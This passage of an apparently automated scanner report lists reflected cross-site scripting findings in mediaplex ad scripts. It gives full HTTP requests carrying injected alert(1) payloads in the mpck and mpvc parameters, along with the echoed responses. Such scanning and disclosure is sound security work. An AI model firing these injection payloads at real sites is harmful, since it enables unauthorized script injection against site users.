Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:18:17 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 17:36:55 GMT
ETag: "372783-104c-4a41d2692bbc0"
Accept-Ranges: bytes
Content-Length: 8960
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
r_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892b1537";alert(1)//429d87c45a");
mpck = mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("http://rover.ebay.com/rover/1/711-126780-2042-1/4?mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2
...[SNIP]...

3.125. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b926c'%3balert(1)//23f98ae54af was submitted in the mpck parameter. This input was echoed as b926c';alert(1)//23f98ae54af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-1%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768033%26Perf_Tracker_2%3D0001004438%26Perf_Tracker_3%3D1183%26adid%3D328072%26imp_id%3D2884646768651692769%26fcid%3D328062%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240959564892%26imp_rvr_id%3D240959564892b926c'%3balert(1)//23f98ae54af&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA.%2Fcnd%3D%216gSCKQj4uwIQrp0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308248220548%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768033%252Fmnum%253D0001004438%252Fcstr%253D43472790%253D_4dfa489d%252C2003200856%252C768033%255E1004438%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D43472790%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248220548&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:18:20 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 17:36:55 GMT
ETag: "372783-104c-4a41d2692bbc0"
Accept-Ranges: bytes
Content-Length: 8964
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
r_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892b926c';alert(1)//23f98ae54af" target="_blank">
...[SNIP]...

3.126. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af910"%3balert(1)//04d9d1f2229 was submitted in the mpvc parameter. This input was echoed as af910";alert(1)//04d9d1f2229 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-1%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768033%26Perf_Tracker_2%3D0001004438%26Perf_Tracker_3%3D1183%26adid%3D328072%26imp_id%3D2884646768651692769%26fcid%3D328062%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240959564892%26imp_rvr_id%3D240959564892&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA.%2Fcnd%3D%216gSCKQj4uwIQrp0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308248220548%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768033%252Fmnum%253D0001004438%252Fcstr%253D43472790%253D_4dfa489d%252C2003200856%252C768033%255E1004438%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D43472790%252Foptn%253D64%253Ftrg%253Daf910"%3balert(1)//04d9d1f2229 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248220548&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:22:42 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 17:36:55 GMT
ETag: "372783-104c-4a41d2692bbc0"
Accept-Ranges: bytes
Content-Length: 8964
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
vertising.com%2Fclick%2Fsite%3D0000768033%2Fmnum%3D0001004438%2Fcstr%3D43472790%3D_4dfa489d%2C2003200856%2C768033%5E1004438%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D43472790%2Foptn%3D64%3Ftrg%3Daf910";alert(1)//04d9d1f2229");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2
...[SNIP]...

3.127. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93046'%3balert(1)//71874017511 was submitted in the mpvc parameter. This input was echoed as 93046';alert(1)//71874017511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-1%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768033%26Perf_Tracker_2%3D0001004438%26Perf_Tracker_3%3D1183%26adid%3D328072%26imp_id%3D2884646768651692769%26fcid%3D328062%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240959564892%26imp_rvr_id%3D240959564892&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA.%2Fcnd%3D%216gSCKQj4uwIQrp0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308248220548%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768033%252Fmnum%253D0001004438%252Fcstr%253D43472790%253D_4dfa489d%252C2003200856%252C768033%255E1004438%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D43472790%252Foptn%253D64%253Ftrg%253D93046'%3balert(1)//71874017511 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248220548&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:22:44 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 17:36:55 GMT
ETag: "372783-104c-4a41d2692bbc0"
Accept-Ranges: bytes
Content-Length: 8964
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
vertising.com%2Fclick%2Fsite%3D0000768033%2Fmnum%3D0001004438%2Fcstr%3D43472790%3D_4dfa489d%2C2003200856%2C768033%5E1004438%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D43472790%2Foptn%3D64%3Ftrg%3D93046';alert(1)//71874017511http://rover.ebay.com/rover/1/711-126780-2042-1/4?mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_D
...[SNIP]...

3.128. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80dda'%3balert(1)//08ad605228a was submitted in the mpck parameter. This input was echoed as 80dda';alert(1)//08ad605228a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-0%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768034%26Perf_Tracker_2%3D0001004441%26Perf_Tracker_3%3D1183%26adid%3D328092%26imp_id%3D425067938274493911%26fcid%3D328082%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240963344343%26imp_rvr_id%3D24096334434380dda'%3balert(1)//08ad605228a&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=240963344343&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA.%2Fcnd%3D%213AQEKQj4uwIQoJ0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F728x90%252Fatf%253Ft%253D1308248219121%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768034%252Fmnum%253D0001004441%252Fcstr%253D27582677%253D_4dfa489d%252C2306156771%252C768034%255E1004441%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D27582677%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248219121&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:18:20 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 18:31:13 GMT
ETag: "289520-1042-4a41de8c3de40"
Accept-Ranges: bytes
Content-Length: 8946
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
r_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=24096334434380dda';alert(1)//08ad605228a" target="_blank">
...[SNIP]...

3.129. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d2b"%3balert(1)//e72c6b3b8dc was submitted in the mpck parameter. This input was echoed as 42d2b";alert(1)//e72c6b3b8dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-0%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768034%26Perf_Tracker_2%3D0001004441%26Perf_Tracker_3%3D1183%26adid%3D328092%26imp_id%3D425067938274493911%26fcid%3D328082%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240963344343%26imp_rvr_id%3D24096334434342d2b"%3balert(1)//e72c6b3b8dc&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=240963344343&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA.%2Fcnd%3D%213AQEKQj4uwIQoJ0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F728x90%252Fatf%253Ft%253D1308248219121%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768034%252Fmnum%253D0001004441%252Fcstr%253D27582677%253D_4dfa489d%252C2306156771%252C768034%255E1004441%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D27582677%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248219121&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:18:18 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 18:31:13 GMT
ETag: "289520-1042-4a41de8c3de40"
Accept-Ranges: bytes
Content-Length: 8946
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
r_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=24096334434342d2b";alert(1)//e72c6b3b8dc");
mpck = mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("http://rover.ebay.com/rover/1/711-126780-2042-0/4?mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2
...[SNIP]...

3.130. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be996"%3balert(1)//1db96dd04f2 was submitted in the mpvc parameter. This input was echoed as be996";alert(1)//1db96dd04f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-0%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768034%26Perf_Tracker_2%3D0001004441%26Perf_Tracker_3%3D1183%26adid%3D328092%26imp_id%3D425067938274493911%26fcid%3D328082%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240963344343%26imp_rvr_id%3D240963344343&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=240963344343&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA.%2Fcnd%3D%213AQEKQj4uwIQoJ0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F728x90%252Fatf%253Ft%253D1308248219121%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768034%252Fmnum%253D0001004441%252Fcstr%253D27582677%253D_4dfa489d%252C